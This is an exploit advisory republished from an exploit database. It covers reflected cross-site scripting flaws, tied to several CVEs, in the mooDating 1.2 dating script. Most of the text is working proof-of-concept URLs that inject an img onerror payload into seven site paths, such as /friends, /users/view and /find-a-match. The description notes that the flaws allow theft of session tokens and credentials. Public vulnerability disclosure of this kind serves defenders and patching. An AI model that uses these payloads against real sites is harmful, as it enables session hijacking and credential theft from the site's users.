Share
## https://sploitus.com/exploit?id=PACKETSTORM:173691
# Exploit Title: mooDating 1.2 - Reflected XSS  
# Exploit Author: CraCkEr aka (skalvin)  
# Date: 22/07/2023  
# Vendor: mooSocial  
# Vendor Homepage: https://moodatingscript.com/  
# Software Link: https://demo.moodatingscript.com/home  
# Tested on: Windows 10 Pro  
# Impact: Manipulate the content of the site  
# CVE: CVE-2023-3849 - CVE-2023-3848 - CVE-2023-3847 - CVE-2023-3846  
CVE-2023-3843 - CVE-2023-3845 - CVE-2023-3844  
  
  
  
## Greetings  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka   
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
  
## Description  
  
The attacker can send to victim a link containing a malicious URL in an email or instant message  
can perform a wide variety of actions, such as stealing the victim's session token or login credentials  
  
  
  
Path: /matchmakings/question  
  
URL parameter is vulnerable to RXSS  
  
https://website/matchmakings/questiontmili%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ew71ch?number=  
https://website/matchmakings/question[XSS]?number=  
  
  
Path: /friends  
  
URL parameter is vulnerable to RXSS  
  
https://website/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3er5c3m/ajax_invite?mode=model  
https://website/friends[XSS]/ajax_invite?mode=model  
  
  
Path: /friends/ajax_invite  
  
URL parameter is vulnerable to RXSS  
  
https://website/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ef26v4?mode=model  
https://website/friends/ajax_invite[XSS]?mode=model  
  
Path: /pages  
  
URL parameter is vulnerable to RXSS  
  
https://website/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l  
https://website/pages[XSS]/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l  
  
Path: /users  
  
URL parameter is vulnerable to RXSS  
  
https://website/userszzjpp%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3eaycfc/view/108?tab=activity  
https://website/user[XSS]/view/108?tab=activity  
  
Path: /users/view  
  
URL parameter is vulnerable to RXSS  
  
https://website/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3el43yn/108?tab=activity  
https://website/users/view[XSS]/108?tab=activity  
  
  
Path: /find-a-match  
  
URL parameter is vulnerable to RXSS  
  
https://website/find-a-matchpksyk%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3es9a64?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0  
https://website/find-a-match[XSS]?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0  
  
  
[XSS Payload]: pksyk"><img src=a onerror=alert(1)>s9a6  
  
  
[-] Done